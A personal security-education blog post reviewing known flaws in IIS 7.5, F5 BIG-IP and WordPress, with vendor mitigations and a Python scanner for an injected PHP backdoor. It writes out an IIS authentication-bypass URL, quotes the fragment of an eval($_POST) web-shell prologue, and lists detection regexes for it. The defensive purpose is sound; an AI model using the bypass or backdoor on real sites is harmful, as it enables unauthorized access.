Hi.

Welcome.

I have documented all my discussions, projects and different trends from obtaining my Master's in Information Assurance and my Doctorate in Information Technology.

The key is - Educate

It is crucial that people are educated about security: how to deter intrusion at one's organization and, most importantly, how to protect oneself.

Building systems and educating others on information assurance have been my exposure for more than half of my life.

This is my journey of accomplishments, even more struggles, and a few solutions.

I hope you enjoy!

vulnerable?

This project called for reviewing a few different organizations and each one's “framework”, i.e. the operating system and the web servers used at each company.  There are many tools for accessing this information.  Overall, the goal was to find and study the details by identifying the vulnerabilities and possible solutions where applicable.  The operating systems and web servers reviewed are very common ones used by many companies today.

The exercise is to teach one how to protect the business.  Realizing that these tools are available, it is best to stay “ahead” of the game.  The tool only required plugging in the website of an organization.  I was able to retrieve the following details on all companies (no company data is being provided).

The information found on the organizations, and the results, are listed below.

Microsoft IIS/7.5 (Web Server):

Microsoft IIS/7.5 was listed with “Multiple vulnerabilities”. “It affects the IIS 7.5 and .net framework 4.0. By appending ":$i30:$INDEX_ALLOCATION" to the directory serving the -- file access restrictions can be successfully bypassed (Microsoft, N.d.)”.   The PHP script is then run without asking for proper credentials, and Classic ASP file access restrictions can also be successfully bypassed.

Another exploit: “http://<victimIIS75>/admin:$i30:$INDEX_ALLOCATION/admin.php will run the PHP script without asking for proper credentials (Microsoft, N.d.)”.

These were both successful and tested on Windows 7.


F5 BIG-IP (OS):

Another finding for the F5 was the “SSH Private Key which affected many systems, one being the BIG-IP (Constantin, 2012)”.   The private key grants access to the root account, “which allows unauthorized users to bypass authentication and login as root (Constantin, 2012)”.   It is “identified as CVE-2012-1493 and can result in a full system compromise (Constantin, 2012)”.

The “CVE-2012-1492 vulnerability has been discovered that may allow a remote user to gain privileged access to affected systems using SSH. The vulnerability is caused by a configuration error, and is not the result of an underlying SSH defect (SOL3600, N.d.)”. 

“Recommended action:

A number of options exist to address this vulnerability. Perform one or more of the following procedures, as appropriate, for your situation:

  • Upgrading to a non-vulnerable version
  • Reconfiguring SSH access
  • Mitigating the risk of exploitation
  • Recovering a compromised system (SOL3600, N.d.)”

WordPress (Web Server):

There is, or was, a “PHP script injection” that attaches itself to PHP files, known as “gumblar.cn/rss/?*” (Kristi, 2009).

“The code was in the beginning of these php files, and started out as follows: <?php if(!function_exists('tmp_lkojfghx')){if(isset($_POST['tmp_lkojghx3']))eval($_POST['tmp_lkojfghx3']);if(!defined('TMP_XHGFJOKL'))…(Kristi, 2009)”.

It was stated that even after “removing the code” it kept showing up in many areas; the final step was to remove the plug-in folders, which removed it (Kristi, 2009).

“In summary, these were the steps I took to remove the code from my site, which took about two hours:

  • Saving the original wp-config.php and custom-functions.php from Thesis after the removal of the script in the top line of the PHP
  • Downloading and installing a fresh copy of WordPress 2.7.1 and my current theme, Thesis 1.5
  • Deleting all plug-ins and re-installing them from inside the WordPress admin panel
  • Changing my WordPress and FTP login passwords to (hopefully) protect my site from further attacks (Kristi, 2009)”
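As an added example (not from the original post or from Kristi's write-up), the following Python script implements the kind of check a site owner could run before the reinstall steps above: it scans the head of every .php file under a site tree for an eval() fed from request data, for the tmp_... function guard, and for the gumblar.cn string, and it runs against constructed sample files rather than real malware.

```python
"""Scan a WordPress tree for the injected eval($_POST[...]) prologue described above."""
import re
import tempfile
from pathlib import Path

# Each marker is (name, regex). The tmp_ prefix and gumblar.cn come from the post;
# the regexes generalise the tmp_ guard to any suffix an injector might use.
MARKERS = [
    ("eval_from_request", re.compile(r"eval\s*\(\s*\$_(?:POST|GET|REQUEST)\s*\[", re.I)),
    ("tmp_function_guard", re.compile(r"function_exists\s*\(\s*['\"]tmp_\w+['\"]\s*\)", re.I)),
    ("gumblar_url", re.compile(r"gumblar\.cn", re.I)),
]

def find_injection(source: str, head_chars: int = 4096) -> list[str]:
    """Return marker names found near the top of a PHP file (the injection is prepended)."""
    head = source[:head_chars]
    return [name for name, rx in MARKERS if rx.search(head)]

def scan_tree(root: Path) -> dict[str, list[str]]:
    """Map each suspicious .php file under root (path relative to root) to its markers."""
    hits: dict[str, list[str]] = {}
    for path in root.rglob("*.php"):
        found = find_injection(path.read_text(encoding="utf-8", errors="replace"))
        if found:
            hits[path.relative_to(root).as_posix()] = found
    return hits

# Constructed samples, shaped like the snippet quoted in the post but with
# made-up names; neither is real malware.
INFECTED_SAMPLE = (
    "<?php if(!function_exists('tmp_abcdxyz')){if(isset($_POST['tmp_abcdxyz3']))"
    "eval($_POST['tmp_abcdxyz3']);} ?>\n"
    "<?php /* original theme file follows */ get_header(); ?>\n"
)
CLEAN_SAMPLE = (
    "<?php\n"
    "$name = $_POST['name'] ?? '';  // reads request data but never eval()s it\n"
    "echo htmlspecialchars($name);\n"
)

def demo() -> dict[str, list[str]]:
    """Write both samples into a temporary site tree and scan it."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / "wp-content" / "plugins").mkdir(parents=True)
        (root / "index.php").write_text(INFECTED_SAMPLE)
        (root / "wp-content" / "plugins" / "hello.php").write_text(CLEAN_SAMPLE)
        return scan_tree(root)

if __name__ == "__main__":
    for rel, markers in demo().items():
        print(f"{rel}: {', '.join(markers)}")
```

Only the head of each file is inspected because, as the post notes, the injected code sits at the very beginning of the PHP files; a file flagged here is a candidate for the "save, reinstall, rotate passwords" steps listed above.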